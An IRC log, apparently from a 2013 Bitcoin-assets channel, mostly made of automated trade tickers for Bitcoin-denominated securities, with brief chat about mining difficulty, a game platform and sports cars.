@ 0.024825 BTC [-] Jun 06 23:13:32 [HAVELOCK] [ASICM] 9 @ 0.025 = 0.225 BTC [-] Jun 06 23:13:42 [BTCTC] [ASICMINER-PT] 2 @ 2.4989 = 4.9978 BTC [+] Jun 06 23:15:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.024825 = 0.0497 BTC [-] Jun 06 23:16:31 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] Jun 06 23:16:50 [BTCTC] [COGNITIVE] 1 @ 0.2899 BTC [+] Jun 06 23:16:52 [BTCTC] [COGNITIVE] 2 @ 0.2999 = 0.5998 BTC [+] Jun 06 23:16:53 [BTCTC] [COGNITIVE] 2 @ 0.3189 = 0.6378 BTC [+] Jun 06 23:16:55 [BTCTC] [COGNITIVE] 1 @ 0.318901 BTC [+] Jun 06 23:19:25 [BTCTC] [PAJKA.BOND] 8 @ 0.095 = 0.76 BTC [+] Jun 06 23:19:27 [BTCTC] [PAJKA.BOND] 10 @ 0.095 = 0.95 BTC [+] Jun 06 23:20:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.024825 = 0.1738 BTC [-] Jun 06 23:20:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.024825 = 0.0497 BTC [-] Jun 06 23:23:06 [BTCTC] [TAT.ASICMINER] 14 @ 0.024824 = 0.3475 BTC [-] Jun 06 23:23:41 [HAVELOCK] [HIM] 20 @ 0.3001 = 6.002 BTC [-] Jun 06 23:24:58 [HAVELOCK] [ASICM] 37 @ 0.02499 = 0.9246 BTC [-] Jun 06 23:25:01 [HAVELOCK] [HIM] 3 @ 0.3001 = 0.9003 BTC [-] Jun 06 23:26:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.024825 = 0.0497 BTC [+] Jun 06 23:26:09 [HAVELOCK] [HIM] 1 @ 0.3001 BTC [-] Jun 06 23:28:23 [BTCTC] [TAT.ASICMINER] 19 @ 0.024825 = 0.4717 BTC [+] Jun 06 23:28:25 [MPEX] [S.DICE] 1000 @ 0.00249791 = 2.4979 BTC [+] Jun 06 23:29:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.024825 = 0.2483 BTC [+] Jun 06 23:31:02 [HAVELOCK] [ASICM] 38 @ 0.025 = 0.95 BTC [+] Jun 06 23:31:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.024825 = 0.1241 BTC [+] Jun 06 23:32:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.024825 = 0.149 BTC [+] Jun 06 23:33:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.024825 = 0.0745 BTC [+] Jun 06 23:34:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.025031 = 0.1001 BTC [+] Jun 06 23:35:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.025031 = 0.1502 BTC [+] Jun 06 23:36:42 [BTCTC] [TAT.ASICMINER] 67 @ 0.025032 = 1.6771 BTC [+] Jun 06 23:39:12 [HAVELOCK] [ASICM] 4 @ 0.02499 = 0.1 BTC [-] Jun 06 23:39:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.025032 = 0.0751 BTC [+] Jun 06 23:42:17 !ticker h him Jun 06 23:42:19 [HAVELOCK:HIM] 1D: 0.29600000 / 0.30707549 / 0.31900000 (510 shares, 156.60850000 BTC), 7D: 0.24000000 / 0.27944357 / 0.31900000 (2070 shares, 578.44819000 BTC), 30D: 0.15251000 / 0.23457784 / 0.31900000 (7410 shares, 1738.22178100 BTC) Jun 06 23:43:55 [HAVELOCK] [ASICM] 2 @ 0.02524999 = 0.0505 BTC [+] Jun 06 23:46:00 [HAVELOCK] [HIM] 23 @ 0.3001 = 6.9023 BTC [-] Jun 06 23:46:30 [HAVELOCK] [HIM] 560 @ 0.3 = 168 BTC [-] Jun 06 23:49:09 [HAVELOCK] [ASICM] 36 @ 0.02524999 = 0.909 BTC [+] Jun 06 23:49:43 [BTCTC] [ASICMINER-PT] 1 @ 2.4987 BTC [-] Jun 06 23:49:48 [HAVELOCK] [ASICM] 100 @ 0.02525 = 2.525 BTC [+] Jun 06 23:50:49 [HAVELOCK] [ASICM] 21 @ 0.02528 = 0.5309 BTC [+] Jun 06 23:51:39 [HAVELOCK] [ASICM] 6 @ 0.02528 = 0.1517 BTC [+] Jun 06 23:53:29 [BTCTC] [ASICMINER-PT] 1 @ 2.4987 BTC [-] Jun 06 23:53:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.025032 BTC [+] Jun 06 23:54:18 [BTCTC] [ASICMINER-PT] 1 @ 2.4987 BTC [-] Jun 06 23:55:22 [BTCTC] [TAT.ASICMINER] 15 @ 0.025033 = 0.3755 BTC [+] Jun 06 23:55:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.025033 = 0.1001 BTC [+] Jun 06 23:56:42 hi all Jun 06 23:56:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.025034 = 0.2003 BTC [+] Jun 06 23:56:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.025035 = 0.3004 BTC [+] Jun 06 23:57:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.025035 = 0.5007 BTC [+] Jun 06 23:58:20 [BTCTC] [TAT.ASICMINER] 41 @ 0.025035 = 1.0264 BTC [+] Jun 07 00:00:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.025035 = 0.3755 BTC [+] Jun 07 00:00:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02505 BTC [+] Jun 07 00:01:24 [HAVELOCK] [ASICM] 1 @ 0.02525 BTC [-] Jun 07 00:01:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02505 BTC [+] Jun 07 00:02:00 [BTCTC] [TAT.ASICMINER] 13 @ 0.02505 = 0.3257 BTC [+] Jun 07 00:04:30 [BTCTC] [ASICMINER-PT] 4 @ 2.498699 = 9.9948 BTC [-] Jun 07 00:05:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.02505 = 0.2505 BTC [+] Jun 07 00:05:34 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [+] Jun 07 00:07:15 [BTCTC] [TAT.ASICMINER] 39 @ 0.025032 = 0.9762 BTC [-] Jun 07 00:09:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [-] Jun 07 00:10:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1939 BTC [-] Jun 07 00:14:19 [HAVELOCK] [HIM] 16 @ 0.3001 = 4.8016 BTC [+] Jun 07 00:14:21 [HAVELOCK] [HIM] 24 @ 0.3 = 7.2 BTC [-] Jun 07 00:17:12 [BTCTC] [ASICMINER-PT] 2 @ 2.498699 = 4.9974 BTC [-] Jun 07 00:24:27 [BTCTC] [ASICMINER-PT] 1 @ 2.4985 BTC [-] Jun 07 00:25:49 [MPEX] [S.MPOE] 4915 @ 0.00073779 = 3.6262 BTC [-] Jun 07 00:25:51 [MPEX] [S.MPOE] 7793 @ 0.00073754 = 5.7476 BTC [-] Jun 07 00:27:40 hi mjr_ Jun 07 00:28:31 whats new Jun 07 00:29:58 nothing much. goat is prolly buying escalade instead of lamborghini Jun 07 00:30:32 white person in an escalade... Jun 07 00:32:13 even better, white goat in escalade Jun 07 00:38:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 07 00:38:08 [BTCTC] [TAT.ASICMINER] 62 @ 0.025 = 1.55 BTC [+] Jun 07 00:40:36 [BTCTC] [ASICMINER-PT] 2 @ 2.4985 = 4.997 BTC [-] Jun 07 00:42:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.0249 = 0.2241 BTC [-] Jun 07 00:50:46 [MPEX] [S.MPOE] 1095 @ 0.00073754 = 0.8076 BTC [-] Jun 07 00:50:48 [MPEX] [S.MPOE] 5100 @ 0.00073732 = 3.7603 BTC [-] Jun 07 00:50:59 [MPEX] [S.MPOE] 15350 @ 0.00073723 = 11.3165 BTC [-] Jun 07 00:51:01 [MPEX] [S.MPOE] 5000 @ 0.00073678 = 3.6839 BTC [-] Jun 07 00:51:04 [MPEX] [S.MPOE] 10950 @ 0.00073654 = 8.0651 BTC [-] Jun 07 00:51:14 [MPEX] [S.MPOE] 2636 @ 0.00073642 = 1.9412 BTC [-] Jun 07 00:51:16 [MPEX] [S.MPOE] 1205 @ 0.00073577 = 0.8866 BTC [-] Jun 07 00:55:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 07 00:55:38 [MPEX] [S.MPOE] 9860 @ 0.00073577 = 7.2547 BTC [-] Jun 07 00:55:39 [BTCTC] [PAJKA.BOND] 2 @ 0.092 = 0.184 BTC [-] Jun 07 00:58:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [+] Jun 07 01:00:19 [BTCTC] [BITVPS] 401 @ 0.000699 = 0.2803 BTC [-] Jun 07 01:09:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 07 01:11:13 [BTCTC] [ASICMINER-PT] 1 @ 2.49425 BTC [-] Jun 07 01:12:41 [BTCTC] [PAJKA.BOND] 2 @ 0.091 = 0.182 BTC [-] Jun 07 01:12:43 [BTCTC] [PAJKA.BOND] 2 @ 0.09 = 0.18 BTC [-] Jun 07 01:12:44 [BTCTC] [PAJKA.BOND] 6 @ 0.081007 = 0.486 BTC [-] Jun 07 01:12:47 [BTCTC] [PAJKA.BOND] 13 @ 0.081006 = 1.0531 BTC [-] Jun 07 01:13:51 [MPEX] [S.MPOE] 13900 @ 0.00073503 = 10.2169 BTC [-] Jun 07 01:14:08 [BTCTC] [TAT.ASICMINER] 23 @ 0.025 = 0.575 BTC [+] Jun 07 01:17:08 [BTCTC] [TAT.ASICMINER] 52 @ 0.025 = 1.3 BTC [+] Jun 07 01:18:36 [HAVELOCK] [HIM] 5 @ 0.31 = 1.55 BTC [+] Jun 07 01:19:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.02505 = 0.1253 BTC [+] Jun 07 01:19:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 07 01:19:32 [BTCTC] [TAT.ASICMINER] 26 @ 0.0249 = 0.6474 BTC [-] Jun 07 01:26:09 [BTCTC] [ASICMINER-PT] 1 @ 2.49849 BTC [+] Jun 07 01:26:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.02505 = 0.1253 BTC [+] Jun 07 01:33:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.193999 BTC [+] Jun 07 01:38:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.02505 = 0.0501 BTC [+] Jun 07 01:38:18 [HAVELOCK] [HIM] 10 @ 0.3001 = 3.001 BTC [-] Jun 07 01:38:20 [HAVELOCK] [HIM] 15 @ 0.3 = 4.5 BTC [-] Jun 07 01:41:08 [BTCTC] [PAJKA.BOND] 6 @ 0.089998 = 0.54 BTC [+] Jun 07 01:42:02 [BTCTC] [PAJKA.BOND] 1 @ 0.089999 BTC [+] Jun 07 01:42:34 [BTCTC] [ASICMINER-PT] 1 @ 2.49849 BTC [+] Jun 07 01:42:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.02505 = 0.1253 BTC [+] Jun 07 01:43:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 07 01:43:06 [BTCTC] [TAT.ASICMINER] 11 @ 0.0249 = 0.2739 BTC [-] Jun 07 01:43:12 [BTCTC] [TAT.ASICMINER] 7 @ 0.025099 = 0.1757 BTC [+] Jun 07 01:44:06 [BTCTC] [ASICMINER-PT] 2 @ 2.49849 = 4.997 BTC [+] Jun 07 01:45:41 [HAVELOCK] [HIM] 1 @ 0.3 BTC [-] Jun 07 01:46:03 [MPEX] [S.MPOE] 3719 @ 0.00073503 = 2.7336 BTC [-] Jun 07 01:46:04 [MPEX] [S.MPOE] 5781 @ 0.00073501 = 4.2491 BTC [-] Jun 07 01:48:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.025099 = 0.1004 BTC [+] Jun 07 01:49:38 [BTCTC] [TAT.ASICMINER] 12 @ 0.025099 = 0.3012 BTC [+] Jun 07 01:56:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 07 02:03:40 [BTCTC] [BTC-BOND] 2 @ 0.00982 = 0.0196 BTC [-] Jun 07 02:05:14 [BTCTC] [BTC-BOND] 20 @ 0.009811 = 0.1962 BTC [-] Jun 07 02:06:09 [BTCTC] [BASIC-MINING] 1 @ 0.71 BTC [+] Jun 07 02:06:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.025097 BTC [+] Jun 07 02:13:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.025097 BTC [+] Jun 07 02:14:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 07 02:18:21 [BTCTC] [B.YABMC] 46 @ 0.0166 = 0.7636 BTC [+] Jun 07 02:18:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] Jun 07 02:20:02 [HAVELOCK] [ASICM] 64 @ 0.02524898 = 1.6159 BTC [-] Jun 07 02:22:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.025097 = 0.1757 BTC [+] Jun 07 02:23:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] Jun 07 02:25:41 [HAVELOCK] [HIM] 2 @ 0.3 = 0.6 BTC [-] Jun 07 02:25:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [-] Jun 07 02:27:32 [BTCTC] [CRYPTO-TRADE] 5 @ 0.189 = 0.945 BTC [-] Jun 07 02:27:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [-] Jun 07 02:31:56 [BTCTC] [LTC-MINING] 35 @ 0.292 = 10.22 BTC [-] Jun 07 02:37:22 [BTCTC] [COGNITIVE] 1 @ 0.304999 BTC [-] Jun 07 02:42:52 [BTCTC] [COGNITIVE] 1 @ 0.290025 BTC [-] Jun 07 02:43:35 [BTCTC] [COGNITIVE] 1 @ 0.290024 BTC [-] Jun 07 02:44:04 ;;bids 100 Jun 07 02:44:09 [BTCTC] [COGNITIVE] 20 @ 0.29 = 5.8 BTC [-] Jun 07 02:44:12 There are currently 48257.145 bitcoins demanded at or over 100.0 USD, worth 5167816.12932 USD in total. | Data vintage: 0.0270 seconds Jun 07 02:45:16 [BTCTC] [COGNITIVE] 2 @ 0.289888 = 0.5798 BTC [-] Jun 07 02:50:09 [BTCTC] [B.YABMC] 44 @ 0.0166 = 0.7304 BTC [+] Jun 07 02:51:11 [BTCTC] [B.YABMC] 1 @ 0.016 BTC [-] Jun 07 02:51:17 [BTCTC] [B.YABMC] 46 @ 0.0155 = 0.713 BTC [-] Jun 07 02:51:19 [BTCTC] [B.YABMC] 6 @ 0.0154 = 0.0924 BTC [-] Jun 07 02:51:25 [BTCTC] [B.YABMC] 100 @ 0.0154 = 1.54 BTC [-] Jun 07 02:55:44 [HAVELOCK] [ASICM] 1 @ 0.02524897 BTC [-] Jun 07 02:59:12 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 07 03:01:00 [HAVELOCK] [ASICM] 15 @ 0.02524 = 0.3786 BTC [-] Jun 07 03:01:38 ;;diffchange Jun 07 03:02:06 Estimated percent change in difficulty this period | 24.96009 % based on data since last change | None % based on data for last three days Jun 07 03:03:19 ;;timetonext Jun 07 03:03:20 837890.10989 Jun 07 03:04:13 ;;estimate Jun 07 03:04:42 I think we'll have 2 more difficulty changes in june Jun 07 03:04:42 Next difficulty estimate | 19500813.2127 based on data since last change | None based on data for last three days Jun 07 03:06:23 yeah Jun 07 03:06:40 ;;nethash Jun 07 03:07:08 139594.388365 Jun 07 03:07:17 ;;calc 19.5 * 1.2 Jun 07 03:07:17 23.4 Jun 07 03:07:40 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 07 03:08:33 [BTCTC] [ASICMINER-PT] 3 @ 2.4891 = 7.4673 BTC [-] Jun 07 03:10:22 wow 19mn Jun 07 03:16:54 It'll be close both in terms of # of diff changes and diff increase for the 25 million bitbet for June Jun 07 03:17:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.02485 = 0.0497 BTC [-] Jun 07 03:18:49 [BTCTC] [B.YABMC] 2 @ 0.01666 = 0.0333 BTC [+] Jun 07 03:18:56 [MPEX] [S.MPOE] 600 @ 0.00073501 = 0.441 BTC [-] Jun 07 03:19:22 ;;calc 837890 / 60 / 60 / 24 Jun 07 03:19:22 9.69780092593 Jun 07 03:19:39 10 days until the next diff change Jun 07 03:22:04 And we get to test the theory that price follows difficulty Jun 07 03:24:21 seems that way Jun 07 03:25:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [-] Jun 07 03:32:05 [HAVELOCK] [ASICM] 3 @ 0.02524897 = 0.0757 BTC [+] Jun 07 03:34:38 [BTCTC] [ASICMINER-PT] 19 @ 2.49849 = 47.4713 BTC [+] Jun 07 03:38:59 [HAVELOCK] [ASICM] 5 @ 0.02524897 = 0.1262 BTC [+] Jun 07 03:40:38 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [-] Jun 07 03:44:25 [BTCTC] [BITVPS] 100 @ 0.000748 = 0.0748 BTC [+] Jun 07 03:51:05 [BTCTC] [ASICMINER-PT] 4 @ 2.4891 = 9.9564 BTC [-] Jun 07 03:51:09 [BTCTC] [ASICMINER-PT] 3 @ 2.489 = 7.467 BTC [-] Jun 07 03:55:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [-] Jun 07 03:59:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.02485 = 0.2485 BTC [-] Jun 07 04:00:50 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 07 04:03:33 mircea_popescu you around? Jun 07 04:03:55 yea Jun 07 04:04:10 i wanted to inquire about your vision for the publishing platform for S.MG Jun 07 04:05:30 [MPEX] [S.MPOE] 5050 @ 0.00073501 = 3.7118 BTC [-] Jun 07 04:08:23 ultimately how will the games be sold? Jun 07 04:09:04 [BTCTC] [LTC-MINING] 104 @ 0.292 = 30.368 BTC [-] Jun 07 04:11:15 [BTCTC] [TAT.ASICMINER] 35 @ 0.02485 = 0.8698 BTC [-] Jun 07 04:14:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.0249 = 0.747 BTC [+] Jun 07 04:17:45 [BTCTC] [ASICMINER-PT] 11 @ 2.489 = 27.379 BTC [-] Jun 07 04:18:19 seems like that would be up to the board, no? Jun 07 04:21:47 [BTCTC] [BTC-GOLD] 1 @ 0.0053 BTC [-] Jun 07 04:24:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 04:28:06 [HAVELOCK] [ASICM] 1 @ 0.025245 BTC [-] Jun 07 04:33:28 [HAVELOCK] [ASICM] 3 @ 0.025245 = 0.0757 BTC [-] Jun 07 04:38:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [+] Jun 07 04:40:30 [BTCTC] [ASICMINER-PT] 2 @ 2.488 = 4.976 BTC [-] Jun 07 04:40:34 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Jun 07 04:41:35 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 04:41:40 [BTCTC] [ASICMINER-PT] 4 @ 2.489 = 9.956 BTC [+] Jun 07 04:43:24 [BTCTC] [BTC-GOLD] 1 @ 0.005305 BTC [+] Jun 07 04:45:29 [BTCTC] [BTC-GOLD] 9 @ 0.005305 = 0.0477 BTC [+] Jun 07 04:45:31 [BTCTC] [BTC-GOLD] 10 @ 0.00544 = 0.0544 BTC [+] Jun 07 04:48:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.0249 = 0.0747 BTC [+] Jun 07 04:49:17 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 04:51:15 [HAVELOCK] [VTX] 1 @ 0.425 BTC [+] Jun 07 04:51:18 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 04:52:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 04:53:39 [BTCTC] [BITVPS] 45 @ 0.000748 = 0.0337 BTC [+] Jun 07 04:55:05 [BTCTC] [TAT.ASICMINER] 16 @ 0.0249 = 0.3984 BTC [+] Jun 07 04:56:27 [BTCTC] [ASICMINER-PT] 2 @ 2.488 = 4.976 BTC [-] Jun 07 04:56:29 [BTCTC] [ASICMINER-PT] 4 @ 2.489 = 9.956 BTC [+] Jun 07 04:57:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [+] Jun 07 04:57:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [+] Jun 07 04:58:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 05:02:02 [BTCTC] [ASICMINER-PT] 2 @ 2.488 = 4.976 BTC [-] Jun 07 05:05:23 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 05:06:48 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 05:07:54 [BTCTC] [B.YABMC] 5 @ 0.01666 = 0.0833 BTC [+] Jun 07 05:11:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [+] Jun 07 05:14:08 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 05:18:58 thestringpuller https://bitcointalk.org/index.php?topic=224634.msg2392921#msg2392921 Jun 07 05:21:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [+] Jun 07 05:24:18 [BTCTC] [TAT.ASICMINER] 36 @ 0.02485 = 0.8946 BTC [-] Jun 07 05:24:20 [BTCTC] [TAT.ASICMINER] 14 @ 0.02485 = 0.3479 BTC [-] Jun 07 05:24:57 [BTCTC] [S.BBET-PT] 17 @ 0.0022 = 0.0374 BTC [+] Jun 07 05:24:59 [BTCTC] [TAT.ASICMINER] 29 @ 0.02484 = 0.7204 BTC [-] Jun 07 05:25:42 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 05:26:30 [BTCTC] [BITVPS] 1 @ 0.000748 BTC [+] Jun 07 05:32:30 ;;next Jun 07 05:32:31 target for downward continuation: 110 | resistance: 121.75, 122-122.5, 124 | support: 117, 115, 112, 110, 102-105, 94-95 | #bitcoin [Thu, 06 Jun 2013 16:51:12 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 9 hours, 41 minutes, and 18 seconds (1 more message) Jun 07 05:44:32 [HAVELOCK] [ASICM] 3 @ 0.02500003 = 0.075 BTC [-] Jun 07 05:50:29 [BTCTC] [S.BBET-PT] 7 @ 0.002184 = 0.0153 BTC [-] Jun 07 05:50:32 [BTCTC] [S.BBET-PT] 1 @ 0.00181 BTC [-] Jun 07 05:50:34 [BTCTC] [S.BBET-PT] 10 @ 0.0018 = 0.018 BTC [-] Jun 07 05:50:37 [BTCTC] [S.BBET-PT] 26 @ 0.001761 = 0.0458 BTC [-] Jun 07 05:50:39 [BTCTC] [S.BBET-PT] 1 @ 0.00176 BTC [-] Jun 07 05:50:41 [BTCTC] [S.BBET-PT] 5 @ 0.001751 = 0.0088 BTC [-] Jun 07 05:50:42 [BTCTC] [S.BBET-PT] 50 @ 0.00175 = 0.0875 BTC [-] Jun 07 05:50:44 [BTCTC] [S.BBET-PT] 153 @ 0.001705 = 0.2609 BTC [-] Jun 07 05:50:46 [BTCTC] [S.BBET-PT] 100 @ 0.0017 = 0.17 BTC [-] Jun 07 05:51:03 [BTCTC] [PAJKA.BOND] 1 @ 0.083011 BTC [-] Jun 07 05:51:51 [HAVELOCK] [ASICM] 1 @ 0.02524499 BTC [+] Jun 07 05:52:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.0249 = 0.498 BTC [+] Jun 07 05:53:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [+] Jun 07 05:55:48 [BTCTC] [TAT.ASICMINER] 13 @ 0.0249 = 0.3237 BTC [+] Jun 07 05:57:45 [BTCTC] [GSDPT] 1 @ 0.003 BTC [-] Jun 07 05:57:47 [BTCTC] [PAJKA.BOND] 1 @ 0.08301 BTC [-] Jun 07 05:57:50 [BTCTC] [PAJKA.BOND] 3 @ 0.083 = 0.249 BTC [-] Jun 07 05:59:01 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 05:59:03 [BTCTC] [BITVPS] 1 @ 0.000748 BTC [+] Jun 07 06:01:50 [BTCTC] [BITVPS] 1 @ 0.000748 BTC [+] Jun 07 06:05:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 06:14:55 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 06:16:16 [HAVELOCK] [ASICM] 8 @ 0.0252 = 0.2016 BTC [-] Jun 07 06:16:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 06:25:32 [BTCTC] [TAT.ASICMINER] 22 @ 0.0249 = 0.5478 BTC [+] Jun 07 06:37:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 07 06:39:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.024899 BTC [-] Jun 07 06:50:57 ;;seen mircea_popescu Jun 07 06:50:57 mircea_popescu was last seen in #bitcoin-assets 1 hour, 31 minutes, and 58 seconds ago: thestringpuller https://bitcointalk.org/index.php?topic=224634.msg2392921#msg2392921 Jun 07 06:51:04 mircea_popescu: http://www.bogost.com/blog/cow_clicker_1.shtml Jun 07 06:51:30 Don't make an RCE-based game, learn from Zynga :P Jun 07 06:52:58 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 07 06:56:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.024899 = 0.3735 BTC [-] Jun 07 06:56:51 [BTCTC] [TAT.ASICMINER] 185 @ 0.0249 = 4.6065 BTC [+] Jun 07 06:59:44 [HAVELOCK] [HIM] 1 @ 0.3 BTC [-] Jun 07 07:00:27 it's a lotus Jun 07 07:00:38 [HAVELOCK] [ASICM] 2 @ 0.02513999 = 0.0503 BTC [-] Jun 07 07:00:39 [HAVELOCK] [ASICM] 11 @ 0.02514 = 0.2765 BTC [+] Jun 07 07:00:55 Chaaaang-Noi: they're not bad cars, but I'd buy a tesla roadster instead Jun 07 07:00:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.0249 = 0.1992 BTC [+] Jun 07 07:01:06 Chaaaang-Noi: uses the same platform as the lotus exige does too, btw Jun 07 07:01:20 not sold out, no longer manufactured Jun 07 07:01:24 you'd have to buy one used Jun 07 07:01:31 chaaaaaang-noi: the thing to know about lotus is that I belive they might have perfected suspension and handling somewhere long the line Jun 07 07:02:07 KRS-: they did, its why tesla went with building the chassis of the roadster in the lotus plant in england Jun 07 07:02:15 and finishing them here in america Jun 07 07:02:23 (model s is done entirely here) Jun 07 07:02:32 Chaaaang-Noi: basically, its this Jun 07 07:02:37 anyone with a tesla roadster Jun 07 07:02:39 will get mad pussy Jun 07 07:02:49 its an extremely exclusive, yet not very expensive, car Jun 07 07:03:01 its not like putting down $2.1m for a veyron Jun 07 07:03:04 anyone can buy a veyron Jun 07 07:03:17 Diablo: I did not know that, seems to tell me that the Tesla is the best of both worlds then. I often see them where I work in Boca Raton, Florida. Its not uncommon to see a $6-figure car wherever you go. Jun 07 07:03:21 the base model of the roadster was like $125k Jun 07 07:03:26 they sure are small though. Jun 07 07:03:38 KRS-: tesla started from nothing Jun 07 07:04:00 KRS-: in the beginning, the genius elon musk was told by everyone Jun 07 07:04:06 "no one would buy a mass produced electric car" Jun 07 07:04:11 so, he made one Jun 07 07:04:21 then they said "well a electric sports car could never be fast" Jun 07 07:04:29 it has a 0 to 60 of like 3.2 seconds Jun 07 07:05:03 then milage Jun 07 07:05:14 for such a small battery pack it gets more than enough milage out of it **** BEGIN LOGGING AT Fri Jun 7 17:32:00 2013 Jun 07 17:32:33 ;;next Jun 07 17:32:34 retracement target: 120-124 | #bitcoin [Fri, 07 Jun 2013 12:42:41 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 hour, 49 minutes, and 52 seconds ago Jun 07 17:34:45 [BTCTC] [PAJKA.BOND] 1 @ 0.08962 BTC [+] Jun 07 17:34:47 [BTCTC] [PAJKA.BOND] 1 @ 0.089629 BTC [+] Jun 07 17:38:02 [BTCTC] [PAJKA.BOND] 1 @ 0.08999 BTC [+] Jun 07 17:38:46 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jun 07 17:40:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.025093 = 0.0502 BTC [+] Jun 07 17:41:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.025094 = 0.2008 BTC [+] Jun 07 17:44:44 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jun 07 17:45:42 [BTCTC] [PAJKA.BOND] 2 @ 0.08999 = 0.18 BTC [+] Jun 07 17:45:45 [BTCTC] [PAJKA.BOND] 2 @ 0.09 = 0.18 BTC [+] Jun 07 17:45:59 [BTCTC] [BITVPS] 146 @ 0.000745 = 0.1088 BTC [+] Jun 07 17:46:01 [BTCTC] [BITVPS] 350 @ 0.000748 = 0.2618 BTC [+] Jun 07 17:46:06 [BTCTC] [BITVPS] 78 